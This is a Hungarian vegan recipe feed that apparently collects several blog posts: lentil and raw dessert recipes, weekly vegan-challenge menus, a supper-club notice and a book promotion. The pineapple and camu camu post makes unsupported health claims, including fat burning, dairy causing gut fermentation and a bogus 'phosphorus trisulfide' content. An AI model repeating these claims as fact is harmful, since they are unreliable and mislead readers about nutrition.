Egy közepes lábasban felhevítjük az olívaolajat, rádobjuk a hagymát, 1 percig dinszteljük, majd hozzáadjuk a lencsét, babérlevelet, sárgarépát és almát. Felöntjük annyi vízzel, ami 3 ujjnyira ellepi. Fedő alatt, mérsékelt lángon 10-15 percig főzzük, amíg a lencse megpuhul. A babérlevelet eltávolítjuk, majd az ételt botmixerrel pürésítjük. Annyi rizstejet adhatunk hozzá, amennyitől a babának jó állagú lesz (rizstej hozzáadása nélkül is kiváló).
*****
A könyvet a Boook Kiadó biztosította a teszteléshez. A receptek a kiadó engedélyével jelentek meg. A véleményem csakis a sajátom.
Voilá, a május 10-ei gourmet vacsoránk menüje!
Voilá, a május 10-ei gourmet vacsoránk menüje! Híres epres tiramisunkat most élőben megkóstolhatjátok, hiszen ezzel zárjuk a menüt! MENU Puhított retek, édeskömény pesto, grissini Uborka és citrom granita Curry primőrökkel Epres tiramisu Következő ?#? nyersvegán? gourmet vacsoráink időpontjai: Május 10. szombat 19.00 óra Budapest, Madal Cafe Május 31. szombat 19.00 óra Budapest, Madal Cafe HELYFOGLALÁS: repakonyha@gmail.com vagy Repka Ágnes: 06-70-702-8187 4 fogásos vacsorák Ínyenc, vegan élő ételekkel (Nem használunk glutént vagy cukrot és nem melegítjük az ételeinket 40 fok fölé, így az összes tápanyag és enzim élő marad bennük.) 10-15 fős társaság 5900 Ft/fő https://www.facebook.com/events/587286478021831/
Lucumás – kakaós gabonakávé rizstejjel
… és a címmel már el is mondtam a hozzávalókat.
Ebben a hideg időben megkívántam egy jó meleg csokis italt, ez jutott eszembe.
Egy piciny forró vízzel felöltöttem a gabonakávét és a kakaót, hozzákevertem egy pici lucuma port ízesítésnek, majd édesítettem a tömény szirupféle barnaságot, és felöntöttem meleg rizstejjel.
Ilyen szépen kettévált.. mint valami designos kávé.
Finom volt.
U.i.: A lucumáról, hogy milyen nagyon finom, több helyen hallottam, hogy áradoznak. Nekem személy szerint a kakaó és vanília íz jobban ízlik, csak kipróbálásra vettem egy keveset. Nem lesz hosszú távra honos a konyhában egyrészt az ára miatt, másrészt mert finom ugyan, de picikét talán többet vártam tőle. Viszont egyes ételek ízesítésére azért bedobható változatosságként, főleg édességekbe.
Egészségetekre!
Táplálék a léleknek - Könyvajánló
Már nálunk is kapható, Sri Chinmoy A boldogság ékkövei - inspiráció és bölcsesség az élet-utazáshozcímű könyv. Igazi táplálék a léleknek. Ajánlások a könyvhöz: ,,A bölcsesség ezen édes ékkövei, melyeket kedves barátom, Sri Chinmoy írt, a bátorítás, szeretet és jóság időtlen igazságai. A boldogság ékkövei arra ösztönöz majd, hogy azzá válj, aki valóban vagy - egy ragyogó gyermekké Isten nagy családjában. Desmond Tutu érsek, Dél-Afrika ,,Sri Chinmoy a béke és a szeretet igaz hangja volt, alapul véve az emberiesség mélységes alapelveit. Olyan világba visz el minket, ahol a szívünk és a törekvéseink szabadon szárnyalhatnak. Egy olyan helyre, ahol legóhajtottabb vágyunkat követjük, - hogy felfedezzük a boldogság valódi jelentését - a boldogság ékkövét bennünk. Dr. José Ramos-Horta, Timor-Leste (Kelet-Timor) miniszterelnöke, Béke Nobel-díjas ,,A boldogság ékkövei nagyszerű és inspiráló, magát Sri Chinmoyt tükrözi. Erőteljesen közvetíti a csendes belső békét, mely olyannyira lénye része volt, és a könyvből egy helyesen élt életből fakadó spirituális öröm is sugárzik. Jane Goodall, PhD, A Jane Goodall Intézet alapítója, az ENSZ békehírnöke ,,Sri Chinmoy tudást visszhangzik. A könyv olvasása hozzásegít, hogy megtapasztald azt a sugárzó és határtalan tudatosságot, hogy miként érd el a boldogságot. Köszönjük, Sri Chinmoy. Roberta Flack, Négyszeres Grammy-díjas énekes és zenész ,,Pusztán ezeknek az oldalaknak az olvasása, melyeket Sri Chinmoy írt, a béke érzését hozta nekem. Hazahívó, szerető hangként visszavezettek a világ vadságából önmagamhoz, és ahhoz a tudatossághoz, hogy a feltétel nélküli adás, a szeretet és a boldogság életünk minden pillanatában lehetségesek. Ez a könyv túlcsordul a bölcsesség ékköveitől, melyek mindenkire várnak, akik elfogadnak egy spirituális utat, és annak szentelik az életüket, hogy naponta szolgálják az emberiséget. Charles Johnson professzor, Elismert író, a Nemzeti Könyv Díj nyertese ,,Kedves barátom és tanítóm, Sri Chinmoy, milliókat inspirált saját példájával, hogy mindannyiunknak szabad bejárása van minden lehetőség mezejére. A boldogság ékköveiben szereplő csodálatos elmélkedések arra bátorítanak, hogy egy kreatívabb és betöltőbb életet éljünk. Paul Horn, Fuvolista és zeneszerző
Vörös lencsés-répás vagdalt (vegán)
A hüvelyesek, azok közül is a legismertebb, a lencse, az ószövetségi korban és Jézus korában is a gabonafélék után a második legfontosabb alkotóeleme volt az étrendnek. Az olaj mellett szárított fügét, kb. 3,5 kg búzát és 1 kg lencsét tartottak a létfenntartáshoz elengedhetetlenül szükségesnek. Egy ókori szerző több mint húszféle hüvelyest vett számba, amelyek között a legfontosabb a lencse és a csicseriborsó volt. (...) A lencse, különösen a vörös változata Szíriában és Egyiptomban is elterjedt volt. Néhány tudós szerint Edóm bibliai földje (amelynek sziklái és talaja rozsdavörös, és amelynek neve a héber "vörös" szóból származik) az országban mindenfelé bőven termő vörös lencséről kapta nevét. A leghíresebb lencséhez kötődő bibliai történet természetesen az a vöröslencse-étel, amelyért Ézsau eladta elsőszülöttségi jogát. (1 Móz.25. fejezet). A lencse fehérjetartalma következtében a belőle készült étel tápláló és laktató is volt, különösen, ha gabonával is keverték. Böjt idején szokás volt, hogy a húsételeket más tápláló ételekkel, például lencsével váltották ki. Tápláló tulajdonságai és könnyen tárolható és szállítható volta a lencsét a parasztok jellegzetes ételévé tette. Jézus idejében még édességeket is készítettek lencséből. (Forrás: Ételek a Biblia korában.) Most ugyan nem szárítottam meg és kevertem össze mézzel, mint az ókori édességkészítések során, de egy nagyon finom vagdaltat kreáltam belőle.
A recept:
Hozzávalók:
1 csomag (50 dkg) vörös lencse
apró szemű zabpehely
2 evőkanál őrölt lenmag
4 evőkanál sörélesztő pehely (elhagyható)
1 hagyma
3-4 gerezd fokhagyma
1 reszelt nyers répa
2 felkarikázott, megpárolt répa
petrezselyem levél
ételízesítő (házi, ha lehet)
alufólia
víz
só
Elkészítés:
A vöröslencsét miután megmostuk, megáztatjuk míg meg nem duzzad. Ekkor már vörös színét szinte elveszti. Ezt követően kevés ételízesítővel és némi vízzel puhára főzzük. Míg fő, két répát felkarikázunk majd megpároljuk. A megfőtt lencsét és megpárolódott répakarikákat összekeverjük. Annyi zabpelyhet teszünk hozzá, amennyit felvesz úgy, hogy szinte formázhatóvá váljon. Ízesítjük aprított hagymával, fokhagymával, petrezselyemlevéllel, s ha úgy érezzük, még egy kis sót is tehetünk bele.
Tepsink hosszának megfelelő méretben alufóliából egy nagyobb darabot letépünk. Erre halmozzuk rá a massza egy részét (felét vagy harmadát), úgy, hogy rudat tudjunk formálni belőle a kezünkkel. Amikor a rúd egybeállt, megszórjuk a reszelt sárgarépa egy részével, majd az alufóliával betakarjuk és a tepsibe tesszük. A maradék masszával hasonlóan járunk el. Amikor mindegyik rudunk a tepsiben pihen, ételízesítővel elkevert vízzel (kb. 2-3 dl) felöntjük a tepsit és sütőben kb. 35 perc alatt készre sütjük, jobban mondva pároljuk.
A lé nagy része elpárolódik, elfő alóla, ha mégis marad, akkor azt már nem használjuk fel. Ezt követően a fóliákat szétnyitjuk, kicsit engedjük, hogy a maradék gőz és pára távozzon, majd amikor már nem túl forró, egy óvatos, de gyors mozdulattal, a fólia segítségével átemeljük a tálcánkra vagy tálunkra a kész vagdaltat.
Spenótfőzeléket ettünk hozzá, de igazából krumplipüré és sok saláta kíséretében is el tudom képzelni. Szendvicsfeltétnek is elkészíthetjük.
Mennyei nyers szedertorta (gluténmentes)
Egy jó barátunk dupla születésnapra készülve felkért, hogy készítsek valami egészséges tortát, amiben nincs hozzáadott cukor, mert az ünnepelt egyike mindenféle - iparilag előállított - cukrot mellőz az étrendjéből. A másik ünnepelt pedig szintén az egészséges táplálkozást követi. Erre az alkalomra debütáltam az alábbi nyers tortával. A leírt adagból készült a szív alakú torta. A krémekből egy kicsit visszatartottam, majd a mandulás alapot 100 g mandulával és valamivel kevesebb mazsolával megismételtem, így nekünk is "jutott" egy kevéske. Annak a képeit is bemutatom. De nem is ez a lényeg, hanem az íze! Ha tudom, ha kóstolom ezt korábban, akkor már sokkal előbb elkészítem és bevezetem a háztartásunkba. Kevés rá a szó, hogy finom. Ha a földön ilyen fenséges ízeket lehet kreálni, akkor milyen lesz a mennyben? :)
A recept:
Hozzávalók:
A torta alapjához:
- 250 g nyers, hámozott mandula
- 4 evőkanál mazsola (én csak a felét áztattam be)
- csipetnyi só (elhagyható)
A torta krémjéhez:
- 300 g nyers kesudió, beáztatva minimum 4-5 órára
- 5 evőkanál mazsola beáztatva kb. fél órára
- 3 púpozott evőkanál kókusz zsír
- 400 g szeder (fagyasztott volt, de kiolvasztottam)
- 3 db citrom kicsavart leve
- 1 db vaníliarúd kikapart magjai
A díszítéshez:
citromfű vagy mentalevél
30-40 szem szeder
Elkészítés:
Először a torta kétfajta krémjét érdemes elkészíteni, mivel azokat érdemes kis időre fagyasztóba tenni. Amíg elkészül a torta alapja, úgymond "tésztája", addig a fagyasztóban dermedhet a torta krémje.
A krém elkészítése, ahogy a hozzávalóknál írtam, a kesudió több órán keresztül való áztatásával történik. Akár egy éjszakát is áztathatjuk és reggel hozzá is kezdhetünk a tortánk készítéséhez. A kesudióról leszűrjük a vizet és a turmixgépünkbe tesszük. (Legalább 500 Wattos legyen a gép!) A három citromot kifacsarjuk, levét hozzáadjuk és elkezdjük turmixolni. Ezt követően hozzáadjuk a megáztatott mazsolát, majd a kókuszzsírt, a vanília belsejét. Amikor krémes állaga lett (ízre leginkább túrókrémre hasonlít), kb. 1/3 részét kivesszük egy tálkába, fagyasztóba tesszük egy kis időre, a nagyobbik részhez pedig hozzáadjuk a kiengedett szeder egy részét (díszítésnek félreteszünk egy részt) és tovább turmixoljuk. Amikor elkészült a szép lilás krém, szintén a fagyasztóba tesszük és elkészítjük a torta alapját.
Aprítógépbe tesszük a mandulát és a mazsolát. Egyesek sót is adnak hozzá, nálam ez elmaradt, nem lett semmi probléma belőle. Jó morzsásra összeaprítjuk. Akkor jó, ha gombócot tudnánk formálni belőle. Egy tortaformát (én szívformát választottam) frissen tartó fóliával kibélelünk, ebbe simítjuk bele a masszát. Kezünkkel elegyengetjük. A fagyasztóból kivesszük először a világos krémet és rásimítjuk az alaptészta tetejére. Utána kivesszük a másik krémet is, hasonlóan rásimítjuk, szederrel és citromfű vagy mentalevéllel díszítjük. Még 1-2 órára fagyasztóba tesszük, hogy jól megszilárduljon. Nem kell teljesen keményre, de így jól szeletelhető lesz. Majd kivesszük, leszedjük róla a fóliát és tálaljuk. Ha ellen tudunk állni annak, hogy az egészet felfaljuk, akkor helyesen cselekszünk. A mandula és a kesudió ugyan egészséges, de mértékletesen ajánlott élni vele.
Köleskoch (gluténmentes, vegán)
Az elmúlt néhány hét (6-7) meglehetősen húzós és sűrű volt. Olyannyira, hogy még blogbejegyzés sem tudtam igazán írni. Rendszeres olvasóimnak ez feltűnt bizonyára. Remélem, így április felénél tartva ez megváltozik és a sok-sok fotó, ami ételeinkről készült, hamarosan receptek társaságában publikálva lesz. Most egy egyszerű ételt alakítottam át, ami nem más, mint a rizskoch. Éppenséggel rizs helyett kölessel. Először sütöttem egy tepsivel vendégeinknek (gyorsan el is fogyott), majd reprodukáltam főzőkörre is némi sárgabarack-tunninggal. :) Aki eljött, megkóstolhatta. Tőlünk nem is olyan messze lakik egy babát váró fiatal házaspár, akiket a főzőkörön ismertünk meg. Nekik ez ízlett a legjobban a legutóbbi - Desszertek témájú - főzőkörön. Ez persze szubjektív. Nem mindenkinek ez volt a févörit. :) Most az első, eredeti verziót prezentálom.
Hozzávalók:
- 30 dkg köles
- 3 dl növényi tej
- 1 citrom lereszelt héja
- édesítő (kókuszvirág-cukor/gyümölcscukor/nyírfacukor, stb)
- 1 vanília kikapart belseje
- 2 evőkanál őrölt lenmag
- 2 evőkanál útifű maghéj
Elkészítés:
A kölest alaposan megmossuk, majd kb. másfélszeres mennyiségű vízben feltesszük főzni. Amikor elfőtt a víz, hozzáadjuk még a növényi tejet és teljesen puhára főzzük. Mikor megfőtt, belereszeljük az alaposan megmosott citrom héját, a vaníliát, az őrölt lenmagot és az útifű maghéjat is hozzákeverjük. Édesítjük ízlelésünknek megfelelően, majd sütőben kb. 50-70 perc alatt készre sütjük. Tálaláskor (barack)lekvárt vagy házi szörpöt csurgathatunk a tetejére. Mindkettővel kipróbáltam. Judit barátnőmtől kaptam még télen egy üveg házilag (általa) eltett szederszörpöt. Azzal öntöztem meg. Fenséges volt! (Judit, köszi az ajándékot!:) így utólag is.)
Vegán Kihívás - 4. hét menüje
HETI MENÜ 22-28. NAP: Ezeket az ételeket minden nap hérheted a budai Édeni Vegán Étteremben is! www.edenivegan.hu 22. NAP Reggeli: készíts édesburgonyás tofurántottát , amihez fogyaszthatsz pirítóst teljes kiőrlésű kenyérből, esetleg avokádó szeleteket is. Ebéd: tésztasaláta Teljes kiőrlésű tésztából készítsd, és a méz helyett agave szirupot használj! Vacsora: paradicsomos vöröslencse dhal esetleg teljes kiőrlésű barna pirítóssal 23. NAP Reggeli: müzlialap (gabonapelyhek, magok, diófélék), leöntve valamilyen (adalékmentes!) növényi tejjel, banánkarikákkal. Ihatsz hozzá frissen facsart narancslevet is, ha kívánod! Ebéd: szendvics teljes kiőrlésű kenyérből, valamelyik korábbi variáció tetszés szerint, vagy kreálhatsz egyénileg is!:-) Vacsora : kölespolenta vegyes zöldségraguval (az eredeti receptből hagyd ki egyszerűen a sütőtököt, ha már nem tudod beszerezni!) Vacsorára magában fogyaszd, kenyér nélkül! 24. NAP Reggeli : egy nagy adag friss gyümölcs saláta , tetszőleges gyümölcsökből, kis őrölt fahéjjal, mazsolával megszórva Ebéd: egy nagy adag zöld leveles vegyes saláta tetszőleges összetevőkből, ehetsz hozzá teljes kiőrlésű pirítóst Vacsora: indiai kukoricaleves 25. NAP: Reggeli: ismét egy jó nagy adag gyümölcs saláta , amibe tehetsz most akár fagyasztott és felolvasztott bogyós gyümölcsöket, amiknek nagy az antioxidáns tartalma! Megszórhatod kis mandulával is! Ebéd: teljes kiőrlésű szendvics Kend meg a kenyeret kis vegán majonézzel (pl. kölesmajonéz), tegyél rá leveles salátát, uborkát, paradicsomot, és néhány friss bazsalikomlevelet! Fogyaszthatsz hozzá friss sárgarépa/ zellerszár hasábokat is! Vacsora: sütőtökös cukkini spagetti curryvel 26. NAP Reggeli: natúr szójajoghurt dióval, 1 ek. őrölt lenmaggal, és egy közepes banán felkarikázva, fél bögre fagyasztott bogyós erdei gyümölcs. Ebéd: paradicsomos, vagy vegán (sajtmentes!) pesztós tészta megszórva 1-2 ek. élesztőpehellyel, és ehetsz hozzá egy nagy tál zöld leveles salátát is, ha kívánod! (tipp: kész vegán pesztó kapható a DM-ben is, nem olcsó, 800 Ft körül egy kis üveg, viszont sokáig kitart) Vacsora: nyers hamburger , vagy Gréta vegán burgerje 27. NAP Reggeli: teljes kiőrlésű gofri Ebéd: bazsalikomos-paradicsomos fehér bab Vacsora: nagy adag zöld leveles saláta valamilyen babfélével, diófélékkel és különféle nyers zöldségekkel. 28. NAP Reggeli: vegán bundás kenyér Ebéd: egy bögre teljes kiőrlésű tészta , 1/4 bögre fehér bab, paradicsomkarikák, 1 ek. olívaolaj, kis citromlé, friss bazsalikomlevelek felaprítva, 2 gerezd fokhagyma összepréselve az öntetbe. DESSZERT: CSOKIIIII!:)) VEGÁN BOUNTY SZELET Recept: Elkészítési idő: kb. 30 perc + 15 perc hűtés Hozzávalók (10 db kis csokihoz): 300 g kókuszreszelék 60 g agave szirup 1 csipet tengeri só 90 g kókusztej-zsír, 1 bio konzerv kókusztej tetejéről (csak a bio minőségnek a tetején szilárdul meg ált. a kókusztej-zsír, mert egyébként adalékok hozzáadásával tartják folyékonyan) A csokimázhoz: 120 g kakaóvaj 120 g fehér mandulakrém 60 g kakaópor 60 g agave szirup 1 csipet tengeri só 2 késhegynyi őrölt vanília Aprítsuk közepesen finomra a kókuszreszeléket egy konyhai aprítógép segítségével. Adjuk hozzá a többi összetevőt, és egy villával keverjük jól össze. Kézzel formázzunk 10 db hosszúkás, a Bounty csokira hasonlító rudacskát. Tegyük rá egy sütőpapírral kibélelt tányérra, és toljuk 10 percre a fagyasztóba. A csokimázhoz olvasszuk fel a kakaóvajat vízgőz fölött. Vegyük le a tűzhelyről, és egy kézi habverővel keverjük hozzá a csokimáz többi összetevőjét. Vegyük ki a kókuszos rudacskákat a fagyasztóból, és tegyük rá őket egy sütőrácsra. Helyezzünk a sütőrács alá egy sütőpapírt. Osszuk el a csokimázat a rudacskákon, és egy kanál hátsó oldalával, vagy ecsettel egyenletesen kenjük rá a csokit. A kanál hátsó oldalával akár kis hullámos mintát is nyomkodhatunk a csokimázba, hogy még Bountysabb legyen a végeredmény:) Ismét tegyük fagyasztóba 5 percre, a sütőpapíron. Utána fogyasztható, és hűtőben tárolható. Vacsora: nagy adag saláta olajmentes öntettel (citromlé, fokhagyma, só, esetleg fehér mizó krém), esetleg barna pirítóssal
Tahini
2014. április 3. Mindennapi ételeink
Házi tahini, ami lényegesen olcsóbb, mint a bolti és nagyon-nagyon finom. És persze, egészséges is. :-) Hozzávalók: 1 dkg szezámmag 3 ek. olívaolaj himalaya só víz fokhagyma / méz / agavé szirup Elkészítés: A kávédarálón megőröljük a szezámmagot, majd egy tálba téve hozzáadjuk az olívaolajat, sót, vizet és botmixerrel krémesre turmixoljuk. Vagy fokhagymával ízesítsük, ha sósan szeretnénk enni, vagy mézzel, agavé sziruppal, ha édesen, pl. sütemény krémek alapanyagaként.
Mákos metélt
Ez az isteni édesség a második fogásom volt ;) Mindenkinek csak ajánlani tudom ? Elkészítési idő: 5 perc Hozzávalók személyenként: 1 csicóka 2 ek darált mák, 1 tk kókuszvirágcukor néhány darab aszalt gyümölcslap (ami leesik a palacsinta széléből, sütikből, azokat a darabokat szórtam bele. Ez most alma-füge aszalvány volt ;) A csicsókát folyó víz alatt […]
Vegán mandulás földimogyorós keksz
2014. március 26. Zizi kalandjai
Na ez az a keksz, amit először odaégettem… mert elszoktam a sütéstől. Remélem sikerül visszarázódnom – ami a sütést illeti -, ráadásul el kell kezdenem Ádi első születésnapi tortájának a tesztelését. A napján egy palacsinta tortát fogok készíteni, aztán a partin, ami néhány nappal később lesz (családokkal, barátokkal együtt ünnepelve) sütni fogok tortát is. Szeretnék teljesen cukormenteset készíteni, ami csak banánnal lesz édesítve, de majd meglátom… lehet, hogy egy kis juharszirupot fog kapni a torta.
Szóval az odaégetésnek köszönhetően második alkalommal kicsit változtattam a recepten, így más lett a tésztának az állaga és a kekszek formája is. Édesítésre az új kedvencemet, a kókuszvirág cukrot használtam. A tojást őrölt lenmaggal és vízzel helyettesítettem. Zablisztet és mandulalisztet adtam hozzá, de ezek változtathatók. Őrölt mandula helyett lehet használni őrölt törökmogyorót, a zab helyett pedig lehet tönkölylisztet használni vagy sima búzalisztet. A földimogyoró és mandula jól kiegészítik egymást, azonban a földimogyorónak dominánsabb az íze. Egy dolgot csinálnék legközelebb másképp… a megsült, kihűlt kekszeket, legalábbis a felüket olvasztott étcsokoládéba mártogatnám. Az étcsokis máz nagyon feldobná ezeket a kekszeket. Tízóraira, uzsonnára, nasinak kávé vagy tea mellé kiváló. Mérettől függően 12-16 darab lesz belőle.
Vegán mandulás földimogyorós keksz
Hozzávalók kb. 12 db-hoz:
- 1/4 bögre földimogyoróvaj (házilag készített vagy boltban kapható)
- 1/4 bögre kókuszzsír (szilárd állapotban)
- 1/2 bögre kókuszvirág cukor
- 1/4 bögre mandulatej (zab-, rizs-, szójatej is használható)
- 1 és 1/4 bögre zabliszt
- 1 bögre őrölt mandula
- 1 evőkanál őrölt lenmag
- 3 evőkanál víz
- 1 teáskanál sütőpor
- 1/2 teáskanál szódabikarbóna
- 1/4 teáskanál Himalaya só + egy kevés a szóráshoz
- 1 vaníliarúd kikapart magjai
Egy kis tálkában keverjük össze a lenmagot a vízzel és hagyjuk állni 4-5 percig, amíg zselés állagú lesz. Melegítsük elő a sütőt 170C fokra.
Egy tálban keverjük össze a földimogyoróvajat a kókuszzsírral és a cukorral. Adjuk hozzá a mandulatejet, majd a lenmagos keveréket és keverjük simára. Ekkor adjuk hozzá a sót, a vaníliát, a sütőport, a szódabikarbónát, majd a végén a zablisztet és a mandulalisztet. Keverjük simára (közepesen lágy tésztát kapunk).
Fagyis- vagy evőkanállal adagoljunk gombócokat a sütőpapírra. Tetejüket szórjuk meg egy kevés sóval és süssük 15-20 percig, amíg aranybarnák lesznek.
Ananász puding
Uzsonnára megleptem magam ezzel a nyers finomsággal ;) Mindenkinek ajánlom, aki egészséges édességet szeretne enni. Előnyei? Pár perc alatt elkészíthető, egészséges, tápláló ééééés NEM HIZLAL :D :D :D Hozzávalók 1 tálkához: 1 ek áztatott dió 1k áztatott tökmag 1 ek áztatott szotyi 1/2 avokádó 3 karikányi friss ananász pici forrásvíz A hozzávalókat összeturmixoljuk, tálkába öntjük, […]
Ananász smoothie camu camuval
2014. március 22. Éltető ételek
Nagyon ízlett ez a camu camu juice, amely alapja a camu gyümölcs és az ananász. Így készítettem egy itthoni változatot, melyet még egy kis gojival is felturbóztam. Én egyszerűen vízzel turmixoltam össze, de akár mandula-, vagy kókusztejet is használhatunk. Mindenesetre NE bocitejjel és tejtermékkel készítsük, mert annak a bélben erjedés lesz az eredménye. A reggeli órákban, délelőtt ajánlom fogyasztani őket, mivel gyümölcs az alapjuk. És ne felejtkezzünk el (mint mindeny gyümölcs esetében) az erjedésgátló fűszerekről sem, mint pl. a szegfűszeg, fahéj, gyömbér. A gojitól gyönyörű napsütés színe lett. Hozzávalók: - 20 dkg tisztított ananász - 1 ek. goji - 1 tk. camu camu por - 1/2 kk. fahéj Ananász Élettani hatásai - Kitűnő emésztési zavarokra. Az érett ananász tartalmaz egy olyan enzimet /bromelint/ amely rendkívül gyors fehérjebontó hatással rendelkezik, ezáltal csökkentheti az emésztési zavarokban szenvedők panaszait. Ezért érdemes a húsfogasztás előtt ananászt is enni, hogy ez az enzim segítse annak gyorsabb lebontását. - Számos vitamin - A, C és B vitaminok - vas és magnézium található benne, a gyümölcssavak és rostok pedig segítik az emésztést. - A zsírégetést felgyorsítja, ezáltal a fogyókúrázók kedvelt gyümölcse. Camu camu - A világ leggazdagabb C vitamin forrása - Camu Camu egy természetes vitaminforrás. Számos tanulmány számolt már be a C-vitamin-hiány és a depresszió közötti összefüggésről. - Széles spektrumú antioxidáns tulajdonságokkal rendelkezik. Harmincszor több C-vitamint, 10-szer több vasat, 3-szor több niacint, 2-szer több riboflavint és 50%-kal több foszfortriszulfidot tartalmaz, mint a narancs. - A Camu Camu béta-karotinokban, kalciumban, leucinban, fehérjékben, szerinben, tiaminban és valinban gazdag. - A Camu Camu cserje a Perutól Brazíliáig húzódó, amazonasi esőerdőben honos. - Ajánlott megfázásra, influenzára. Kiváló antidepresszáns és öregedésgátló. Ezen kívül támogathatja az immunrendszert, a szív- és érrendszert, serkentheti a vérkeringést és a májműködést, támogathatja a légzőszervi problémák megoldását, csökkentheti a szürke hályog kialakulásának lehetőségét.
Vegán KIHÍVÁS - 2 HETI MENÜ
2014. március 24-től a Vegán Kihívás ételei, akár az egész napi menü is, fogyasztható, vagy elvitelre kérhető a budai ÉDENI VEGÁN ÉTTEREMBEN!! HETI MENÜ 8-14. NAP: 8. NAP Reggeli: olíva-,,vajas pirítós , tetszés szerint friss zöldség szeletek, csírák, zöld tea, vagy gabonatejes turmix, esetleg zöld turmix Megjegyzés: ha szívesebben eszel édes ízt reggelire, akkor ehetsz valamilyen kásafélét (tippeket találsz akár ITT is), vagy a szokásos magkrémes kenyeret stb. Nézz körül az előző hét ötletei között is! Ebéd : mandulaszószos - édesburgonyás padlizsántorony Vacsora : zöldséges barna lencse citromos-napraforgós pesztóval Olíva ,,vaj Fogyasztás előtti hűtési idő: kb. 1 óra! Hozzávalók (3-4 főre): 50 ml olívaolaj só Sózd meg egy kicsit az olívaolajat, öntsd egy kis tálba, és tedd be a fagyasztóba kb. 1 órára, amíg az olaj megszilárdul. A hűtőből kivéve kend rögtön a kenyérre, és fogyaszd elJ, mert az olaj gyorsan visszaolvad! Forrás: Attila Hildmann: Vegan for Fit 9. NAP Reggeli : meggyes - mandulás köleskása Ebéd: az előző napról a zöldséges barna lencse citromos-napraforgós pesztóval, friss zöld vegyes salátával Vacsora: spenótos-fenyőmagos rizs-spagetti 10. NAP Reggeli: csokis-mogyorós müzli Ebéd: édesburgonyás sütőtökpüré krémes kelkáposztával Vacsora: tökmagos medvehagyma-pástétom barna kenyérrel 11. NAP Reggeli: teljes kiőrlésű pirítós (ez a legtutibb teljes kiőrlésű kenyér és zsemle recept!), natúr mandula-, vagy kesukrémmel (akár házilag), vagy karobkrémmel Ebéd: spenótos-paradicsomos csicseriborsó (a másik felét eheted a 12. nap ebédjére!) Vacsora: tofu rántotta (édesburgonyás , vagy csak simán:), sárgarépás medvehagymasalátával 12. NAP Reggeli: napindító turmix Ebéd: spenótos-paradicsomos csicseriborsó (az előző napról) Vacsora: teljes kiőrlésű pizza , bármilyen zöldséges feltétet tehetsz rá a gomba helyett 13. NAP Reggeli: gyümölcsös-amarántos kukoricapehely Ebéd: Káposztás (teljes kiőrlésű!) tészta pirított szezámmaggal Vacsora : vöröslencse leves mogyorós-bazsalikompesztóval (ehetsz barna kenyérből pirítóst hozzá, ha szükséges) 14. NAP Reggeli: amarántos palacsinta erdeigyümölcs-fagyival Ebéd: leves az előző napról + kukoricás quinoa Desszert: datolyakaramellás kesuszelet Vacsora: Rozmaringos sütőtök hasábok zöldborsó mártogatóssal Ez a bejegyzés 2014. március 30-ig lesz elérhető a blogon!
Datolyakaramellás kesuszelet
Ez a süti kérem teljes áttörés! Az évek óta gyümölcsöt nem fogyasztó fiam csak úgy kapkodta a tányérról (mondjuk nem kötöttem az orrára, mi van benne...:DDD). Isteni finom valóban! Bárkivel kóstoltattam, teljesen oda volt érte! Nagyon egyszerű elkészíteni, és mivel csak egy-két szeletkével is eltelhet az ember, ezért a megmaradt szeleteket másnap uzsonnára is fogyaszthatod. Akár 5-6 napig is eláll hűtőben, és a készítés másnapján még finomabb!:) Datolyakaramellás kesuszelet Elkészítési idő: kb. 30 perc + 30 perc hűtés Hozzávalók (25 kis kockához): A kesualaphoz 200 g kesudió 1/2 tk. őrölt vanília 1 csipet só 30 g agave, vagy rizsszirup A datolyakaramellhez 220 g datolya magozva (a Kalifa zacskós datolyája tartósító és édesítés nélküli!) 1 tk. őrölt vanília 1 csipet só A csokimázhoz 30 g kakaóvaj (nálam kókuszolaj) 20 g fehér mandulakrém 1/4 tk. őrölt vanília 8 ka kakaó, vagy karob 20 g agave, vagy rizsszirup 1/2 csipet só A tetejére puffasztott amaránt, vagy rizs díszítésnek Az alaphoz ledaráljuk a kesudiót, vagy erős aprítógépben finomra aprítjuk a vaníliával és a sóval. Beletesszük egy tálba, elkeverjük a sziruppal és összegyúrjuk kézzel. A datolyakaramellhez a datolyát összepürésítjük egy aprítógépben, esetleg 2-3 ek. vizet hozzáadva, hogy krémesebb legyen. A mázhoz vízgőz fölött felolvasztjuk a kakaóvajat/ kókuszolajat. Egy tálban összekeverjük a mandulakrémet, a vaníliát, a kakaót, a szirupot és a sót. Hozzáadjuk a felolvasztott kókuszolajat. és egy kézi habverővel az egészet jól elkeverjük. Egy sütőpaírral bélelt tepsire öntjük az alap-masszát, ráteszünk egy másik sütőpapírt és sodrófával kb. 0,5 cm vastagra nyújtjuk. Kézzel szögletesre formázzuk az alapot, levesszük a felső sütőpapírt, arra rátesszük a datolyakaramellt és leöntjük a csokimázzal. Díszítjük puffasztott amaránttal, vagy puffasztott rizzsel és 30 percre betesszük a fagyasztóba, vagy 45 percre a hűtőbe. 3 x 3 cm-es kockákra vágjuk. Forrás: Attila Hildmann: Vegan for Youth
Mandulaszószos, édesburgonyás padlizsán-torony
Egy viszonylag könnyen elkészíthető étel, ami ízhatásában viszont nagyon finom!:) Vacsorára magában is fogyasztható, én ebédre kiegészítettem egy kis főtt barna rizzsel. Mandulaszószos, édesburgonyás-brokkolis padlizsántorony Elkészítési idő: kb. 45 perc Hozzávalók (2 főre): 400 g édesburgonya, kis kockákra vágva 110 g padlizsán, kb. 1,5 cm-es karikákra vágva 2 ek. olívaolaj tengeri só 1 kis fehér hagyma (tisztítás előtt 50 g), finomra aprítva 30 g fehér mandulakrém 1/2 tk. aprított kakukkfű őrölt fekete bors 120 g brokkoli A mandulaszószhoz:60 g fehér mandulakrém 70 ml szénsavmentes ásványvíz 1 tk. citromlé só, bors Előmelegítjük a sütőt 220 fokra, légkeveréssel. A padlizsánt elkeverjük 1 evőkanál olívaolajjal és egy csipet sóval, majd az édesburgonyával együtt egy sütőpapírral bélelt tepsire tesszük. A középső sínen kb. 10 percig sütjük. A maradék olívaolajat egy serpenyőben felmelegítjük, és a hagymát közepes tűzön kb. 3 percig pároljuk benne. Végül összekeverjük a megsült édesburgonyával és a mandulakrémmel. Hozzáadjuk a kakukkfüvet, sózzuk-borsozzuk. A megmosott brokkolit sós vízben kb. 3 percig főzzük, majd egy szitán lecsepegtetjük. A mandulaszósz hozzávalóit egy kézi habverővel összekeverjük, egy kis lábasban folyamatos keverés közben felfőzzük, sózzuk-borsozzuk. És a tornyot megépítjük..., vagy a hozzávalókat a szósszal leöntve tálaljuk.:) Forrás: Attila Hildmann: Vegan for Youth
Vegán kókuszos répa muffin
